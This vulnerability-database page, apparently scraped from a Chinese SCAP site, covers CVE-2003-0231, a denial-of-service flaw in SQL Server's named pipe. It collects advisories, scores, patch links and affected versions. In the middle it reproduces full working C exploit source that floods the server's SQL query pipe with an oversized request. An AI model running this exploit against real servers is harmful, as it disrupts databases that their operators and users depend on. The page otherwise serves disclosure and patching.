CVE-2003-0231
CVSS5.0
发布时间 :2003-08-27 00:00:00
修订时间 :2008-09-10 15:18:19
NMCOEPS    

[原文]Microsoft SQL Server 7, 2000, and MSDE allows local or remote authenticated users to cause a denial of service (crash or hang) via a long request to a named pipe.


[CNNVD]Microsoft SQL Server远程拒绝服务攻击漏洞(MS03-031)(CNNVD-200308-199)

        
        Microsoft SQL Server是微软公司开发和维护的大型数据库系统。
        Microsoft SQL Server在处理超长有名管道请求时存在问题,远程攻击者可以利用这个漏洞对数据库服务进行拒绝服务攻击。
        Microsoft SQL Server支持通过有名管到进行SQL查询,这个管道允许"Everyone"组进行写访问,因此可以被任何本地和远程用户无需验证进行访问。通过发送超大请求到这个管道(大小根据服务包的级别来定),可导致服务停止响应。根据补丁包级别的不同,产生的效果也不同:
        SQL Server 2000 pre-SP3:
        SQL服务会崩溃,需要重新启动。
        SQL Server 2000 SP3:
        SQL服务看起来正常(没有不正常CPU或内存使用率),但是不能响应任何请求。并且不能停掉服务,需要重新启动主机来获得正常功能。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:sql_server:2000:sp3Microsoft SQLServer 2000 Service Pack 3
cpe:/a:microsoft:sql_server:2000::desktop_engine
cpe:/a:microsoft:sql_server:2000:sp1Microsoft SQLServer 2000 Service Pack 1
cpe:/a:microsoft:sql_server:2000:sp3aMicrosoft SQLServer 2000 Service Pack 3a
cpe:/a:microsoft:data_engine:1.0Microsoft data_engine 1.0
cpe:/a:microsoft:sql_server:7.0:sp4Microsoft SQL Server 7.0 Service Pack 4
cpe:/a:microsoft:sql_server:7.0:sp1Microsoft SQL Server 7.0 Service Pack 1
cpe:/a:microsoft:sql_server:2000:sp2Microsoft SQLServer 2000 Service Pack 2
cpe:/a:microsoft:sql_server:7.0:sp3Microsoft SQL Server 7.0 Service Pack 3
cpe:/a:microsoft:sql_server:7.0:sp2Microsoft SQL Server 7.0 Service Pack 2
cpe:/a:microsoft:sql_server:2000Microsoft SQL Server 2000
cpe:/a:microsoft:sql_server:7.0Microsoft SQLServer 7.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:299SQL Server Named Pipe Denial of Service
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0231
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0231
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-199
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/918652
(UNKNOWN)  CERT-VN  VU#918652
http://www.microsoft.com/technet/security/bulletin/MS03-031.asp
(UNKNOWN)  MS  MS03-031
http://www.atstake.com/research/advisories/2003/a072303-2.txt
(UNKNOWN)  ATSTAKE  A072303-2

- 漏洞信息

Microsoft SQL Server远程拒绝服务攻击漏洞(MS03-031)
中危 其他
2003-08-27 00:00:00 2006-09-01 00:00:00
本地  
        
        Microsoft SQL Server是微软公司开发和维护的大型数据库系统。
        Microsoft SQL Server在处理超长有名管道请求时存在问题,远程攻击者可以利用这个漏洞对数据库服务进行拒绝服务攻击。
        Microsoft SQL Server支持通过有名管到进行SQL查询,这个管道允许"Everyone"组进行写访问,因此可以被任何本地和远程用户无需验证进行访问。通过发送超大请求到这个管道(大小根据服务包的级别来定),可导致服务停止响应。根据补丁包级别的不同,产生的效果也不同:
        SQL Server 2000 pre-SP3:
        SQL服务会崩溃,需要重新启动。
        SQL Server 2000 SP3:
        SQL服务看起来正常(没有不正常CPU或内存使用率),但是不能响应任何请求。并且不能停掉服务,需要重新启动主机来获得正常功能。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-031)以及相应补丁:
        MS03-031:Cumulative Patch for Microsoft SQL Server (Q815495)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-031.asp

        补丁下载:
        Microsoft SQL Server 7.0:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=FE5B0892-A5C9-44C2-9B42-0D291E9C1636&displaylang=en

        Microsoft SQL 2000 32-bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=9814AE9D-BD44-40C5-ADD3-B8C99618E68D&displaylang=en

        Microsoft SQL 2000 64-bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=72336508-057A-4E86-8F2E-CB1BD3A6A44B&displaylang=en

- 漏洞信息 (22957)

Microsoft SQL Server 7.0/2000,MSDE Named Pipe Denial Of Service Vulnerability (EDBID:22957)
windows dos
2003-07-23 Verified
0 refdom
N/A [点击下载]
source: http://www.securityfocus.com/bid/8274/info

Microsoft SQL Server and the Microsoft Data Engine have been reported prone to a denial of service attack.

Any local or remote user, who can authenticate and is part of the Everyone Group, may trigger a denial of service condition in an affected SQL Server.

It has been reported that, if a remote attacker sends an unusually large request to a named pipe, the SQL Server will become unresponsive.

////////////////////////////////////////////////////////////////////////////////
//      
//      exp for Microsoft SQL Server DoS(MS03-031)
//
//      By		  : refdom
//		Email	  : refdom@xfocus.org
//		Home Page : http://www.xfocus.org
//
////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>


void Usage()
{
	printf("******************************************\n");
	printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
	printf("\t Written by Refdom\n");
	printf("\t Email: refdom@xfocus.org\n");
	printf("\t Homepage: www.xfocus.org\n\n");
	printf("Usage: DOSMSSQL.exe server buffersize\n");
	printf("eg: SQLScanner.exe 192.168.0.1 9000\n\n");
	printf("The buffersize depends on service pack level.\n");
	printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
	printf("when buffersize is 9000, the server can be crashed.\n");
	printf("\n");
	printf("*******************************************\n\n");
}


int main(int argc, char* argv[])
{
	char lpPipeName[50];
	char *lpBuffer = NULL;
	unsigned long ulSize = 0;

	BOOL bResult;
	DWORD dwWritten = 0, dwMode;
	HANDLE hPipe;

	Usage();

	printf("Starting...\n");

	if (argc != 3)
		goto Exit0;
	
	if (strlen(argv[1]) < 20)
	{
		sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
	}
	else
	{
		printf("Error!server\n");
		goto Exit0;
	}

	ulSize= atol(argv[2]);

	lpBuffer = (char*)malloc(ulSize + 2);
	if (NULL == lpBuffer)
	{
		printf("malloc error!\n");
		goto Exit0;
	}

	memset(lpBuffer, 0, ulSize + 2);
	memset(lpBuffer, 'A', ulSize);
	*lpBuffer = '\x12';
	*(lpBuffer + 1) = '\x01';
	*(lpBuffer + 2) = '\x00';
	
	printf("Connecting Server...\n");

	hPipe = CreateFile(lpPipeName, 
					GENERIC_READ | GENERIC_WRITE,
					0,
					NULL,
					OPEN_EXISTING,
					0,
					NULL);
	if (INVALID_HANDLE_VALUE == hPipe)
	{
		printf("Error!Connect server!%d\n", GetLastError());
		goto Exit0;
	}

   dwMode = PIPE_READMODE_MESSAGE; 
   bResult = SetNamedPipeHandleState( 
      hPipe,    // pipe handle 
      &dwMode,  // new pipe mode 
      NULL,     // don't set maximum bytes 
      NULL);    // don't set maximum time 
   if (!bResult)
   {
		printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
		goto Exit0;
   }

	bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

	if (!bResult)
	{
		printf("\n\tError!WriteFile.%d\n\n", GetLastError());
		printf("When see the error message, the target may be crashed!!\n\n");
		goto Exit0;
	}

Exit0:
	
	return 0;
}		

- 漏洞信息 (F31428)

Atstake Security Advisory 03-07-23.2 (PacketStormID:F31428)
2003-07-24 00:00:00
Atstake,Andreas Junestam  atstake.com
advisory
CVE-2003-0231
[点击下载]

Atstake Security Advisory A072303-2 - By sending a large request to a named pipe used by the Microsoft SQL Server, an attacker can render the service unresponsive. Under some circumstances, the host has to be restarted to recover from this situation.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                             @stake Inc.
                           www.atstake.com 

                          Security Advisory

 
Advisory Name: Microsoft SQL Server DoS
 Release Date: 07/23/2003
  Application: Microsoft SQL Server 7, 2000, MSDE
     Platform: Windows NT/2000/XP
     Severity: Denial of Service
       Author: Andreas Junestam (andreas@atstake.com)
Vendor Status: Microsoft has patch available
CVE Candidate: CAN-2003-0231
    Reference: www.atstake.com/research/advisories/2003/a072303-2.txt


Overview

Microsoft SQL Server supports named pipes as one way of communicating
with the server. This named pipe allows any user to connect and send
data to it. By sending a large request, an attacker can render the
service unresponsive. Under some circumstances, the host has to be
restarted to recover from this situation.


Detailed Description

Microsoft SQL Server supports SQL queries over a named pipe. This
pipe allows write access to the group "Everyone" and is therefor
accessible to anyone that can authenticate, local or remote. By
sending a large request to this pipe (size depends on service pack
level), the service can be rendered unresponsive. The behavior of
the service depends upon the service pack level.

SQL Server 2000 pre-SP3:
The SQL Server service crashes. A restart of the service recovers
from the situation.

SQL Server 2000 SP3:
The SQL Server service appears to be functioning normal (no abnormal
CPU or memory usage), but it is unresponsive to any type of
requests. It is also impossible to stop the service and the only way
to recover from the situation is to restart the host.

As with most SQL Server issues MSDE is effected.  MSDE is
included in many Microsoft and non-Microsoft products. A list
of products that includes MSDE is here:

http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=10&tabid=13


Vendor Response

Microsoft was contacted on 01/28/2003

Vendor has a bulletin and a patch available:

http://www.microsoft.com/technet/security/bulletin/MS03-031.asp


Recommendation

Install the vendor patch.

Disable named pipes as a SQL Server protocol by using the SQL
Server Network Utility.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

  CAN-2003-0231


@stake Vulnerability Reporting Policy:
http://www.atstake.com/research/policy/

@stake Advisory Archive:
http://www.atstake.com/research/advisories/

PGP Key:
http://www.atstake.com/research/pgp_key.asc

Copyright 2003 @stake, Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBPx75Pke9kNIfAm4yEQIHMQCeOJEDixeR/pv4oLrPXlXotZwiDMUAn1Ea
BAyScxbEHPoXDHHma1VFKaa/
=2lzX
-----END PGP SIGNATURE-----


    

- 漏洞信息

2299
Microsoft SQL Server Named Pipe Handling Request Remote DoS
Local Access Required, Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- 漏洞描述

Microsoft SQL Server contains a flaw that may allow a remote denial of service. The issue is triggered when overly long SQL query is sent to named pipe. This pipe allows write access to the group "Everyone" and is therefore accessible to anyone that can authenticate, local or remote. Microsoft SQL Server 2000 Pre-SP3 will stop responding and service needs to be restarted in order to answer requests again. While SQL Server 2000 SP3 will appear to function normally but it will become unresponsive to any type of requests, a restart of the host is needed to recover because it is impossible to stop the service.

- 时间线

2003-07-23 2003-01-28
2003-07-23 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft SQL Server / MSDE Named Pipe Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 8274
No Yes
2003-07-23 12:00:00 2009-07-11 10:56:00
Discovery is credited to Andreas Junstream of @Stake.

- 受影响的程序版本

Microsoft SQL Server 2000 Desktop Engine
+ Akiva WebBoard 6.1
+ Microsoft Access 2000
+ Microsoft Application Center 2000
+ Microsoft BizTalk Server 2000 Developer Edition
+ Microsoft BizTalk Server 2000 Enterprise Edition
+ Microsoft BizTalk Server 2000 Standard Edition
+ Microsoft BizTalk Server 2002 Developer Edition
+ Microsoft BizTalk Server 2002 Enterprise Edition
+ Microsoft Office 2000
+ Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ SmartMax Software MailMax 5.0
+ Veritas Software Backup Exec for Windows Servers 9.0
Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
Microsoft SQL Server 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
Microsoft SQL Server 7.0 SP4
- Microsoft SQL Server 7.0
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP3
- Microsoft SQL Server 7.0
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP2
- Microsoft SQL Server 7.0
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0 SP1
- Microsoft SQL Server 7.0
- Microsoft SQL Server 7.0
Microsoft SQL Server 7.0
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Data Engine (MSDE) 1.0
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0.1
+ Affymetrix Microarray Suite Software 5.0
+ Affymetrix Microarray Suite Software 5.0
+ Affymetrix Microarray Suite Software 5.0
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.5
+ Altiris Deployment Server 5.0.1
+ Altiris Deployment Server 5.0.1
+ Altiris Deployment Server 5.0.1
+ Centennial UK Ltd Centennial Discovery 4.4
+ Centennial UK Ltd Centennial Discovery 4.4
+ Centennial UK Ltd Centennial Discovery 4.4
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0 SP1
+ Compaq Insight Manager 7.0
+ Compaq Insight Manager 7.0
+ Compaq Insight Manager 7.0
+ Gerber Technology WebPDM 3.9
+ Gerber Technology WebPDM 3.9
+ Gerber Technology WebPDM 3.9
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5 SP1
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.5
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 2.0
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.1
+ McAfee ePolicy Orchestrator 1.0
+ McAfee ePolicy Orchestrator 1.0
+ McAfee ePolicy Orchestrator 1.0
- Microsoft Access 2000
- Microsoft Access 2000
- Microsoft Access 2000
- Microsoft Project Central Server
- Microsoft Project Central Server
- Microsoft Project Central Server
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SharePoint Team Services from Microsoft
- Microsoft Visual Studio 6.0
- Microsoft Visual Studio 6.0
- Microsoft Visual Studio 6.0
+ PowerQuest ControlCenter ST 2.0
+ PowerQuest ControlCenter ST 2.0
+ PowerQuest ControlCenter ST 2.0
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ PPM 2000 Incident Reporting and Investigation Management 5.1
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Research In Motion Blackberry Enterprise Server 2.0 .0.65
+ Trend Micro Control Manager 2.5
+ Trend Micro Control Manager 2.5
+ Trend Micro Control Manager 2.5
+ Trend Micro Damage Cleanup Server 1.0
+ Trend Micro Damage Cleanup Server 1.0
+ Trend Micro Damage Cleanup Server 1.0
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 5.0.13
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Vital Processing Services LLC POS-partner 2000 4.1.11
+ Websense Reporter 6.3.1
+ Websense Reporter 6.3.1
+ Websense Reporter 6.3.1

- 漏洞讨论

Microsoft SQL Server and the Microsoft Data Engine have been reported prone to a denial of service attack.

Any local or remote user, who can authenticate and is part of the Everyone Group, may trigger a denial of service condition in an affected SQL Server.

It has been reported that, if a remote attacker sends an unusually large request to a named pipe, the SQL Server will become unresponsive.

- 漏洞利用

The following exploit is available:

- 解决方案

The vendor has released a fix to address this issue.


Microsoft SQL Server 2000 SP3

Microsoft Data Engine (MSDE) 1.0

Microsoft SQL Server 2000 Desktop Engine

Microsoft SQL Server 7.0 SP4

Microsoft SQL Server 2000 SP3a

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站